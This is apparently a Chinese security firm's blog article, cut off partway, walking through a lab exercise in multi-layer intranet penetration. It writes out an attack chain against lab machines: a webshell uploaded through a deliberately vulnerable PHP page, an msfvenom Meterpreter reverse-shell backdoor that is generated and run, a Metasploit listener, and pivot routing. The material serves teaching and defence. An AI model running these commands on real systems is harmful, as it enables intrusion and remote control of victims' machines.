专栏名称: 锦行信息安全
广州锦行网络科技有限公司(简称“锦行科技”)成立于2014年3月,由国内多名顶尖信息安全专家联合创办,拥有数十名一线安全人才,致力于研究国内外最新核心攻防对抗技术及案例,提供基于攻击者视角的新型安全解决方案,帮助政府、企业保障信息资产安全。
目录
相关文章推荐
网信正定  ·  古城限定美景,全国独一无二的存在 ·  昨天  
网信正定  ·  古城限定美景,全国独一无二的存在 ·  昨天  
植物星球  ·  爱护环境,禁止种菜 ·  3 天前  
51好读  ›  专栏  ›  锦行信息安全

安全技术|一个实验了解多层内网渗透

锦行信息安全  · 公众号  ·  · 2020-03-04 10:40

正文

点击上方蓝色,关注我们

近年来,攻击者潜伏在企业内网进行攻击的安全事件屡见不鲜,攻击者在经常会企业的内网进行横向渗透,令防守方防不胜防。因此,我们应该严格控制好网络区域之间的访问规则,加大攻击横向渗透的阻力。本文由锦行科技的安全研究团队提供,旨在通过实验演示进一步了解攻击者是如何在多层内网进行的渗透。


1
实验简介

网络拓扑图

渗透机:win10+kali

第一层靶机 (外网web服务器):  Linux

第二场靶机 (内网web服务器):  Linux

第三层靶机 (内网办公机) : win7

用三层网络来模拟内外网环境,主要了解 MSF 、内网转发等


2
环境搭建
第一层网络

把渗透机kali和win10网卡1设置选择VMnet1:


靶机Linux网卡1设置选择VMnet1,添加网卡2 设置选择VMnet2:

第二层网络

将第二台靶机Linux网卡1设置选择VMnet2,添加网卡2 设置选择VMnet3:

第三层网络

将靶机win7网卡1设置选择VMnet3:

再配置好各台机器对应IP即可。

最后

在第一台Linux和第二台Linux上搭建一个php上传页面,设为存在文件上传漏洞的web页面,以便后续的拿shell进行内网渗透


第一台Linux


第二台Linux


3
实验过程


第一层靶机

win10访问http://192.168.85.131/直接上传一句话木马



蚁剑连接


*进一步做内网渗透,上传msf后门*


打开kali msfconsole 输入

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.85.128 LPORT=4444 -f elf > mshell.elf

生成一个名为mshell.elf的msf后门文件

蚁剑把后门文件上传到Linux靶机

返回msf 开启监听

  • use exploit/multi/handler 使用监听模块

  • set payload linux/x64/meterpreter/reverse_tcp 使用和木马相同的 payload

  • set lhost 192.168.85.128 kaili ip

  • set lport 4444 木马的端口

  • r un 执行


蚁剑打开虚拟终端cd到后门文件的目录下,执行后门文件,输入

  • chmod 777 mshell.elf 加执行权限

  • ./mshell.elf 执行文件

Kail接受到MSF会话

输入ifconfig,发现第二层172.10.10.0/24网段

添加路由

  • background 将会话转到后台

  • route add 172.10.10.0 /2 4 1

    加 172.10.10.0/24网段 使用session1







请到「今天看啥」查看全文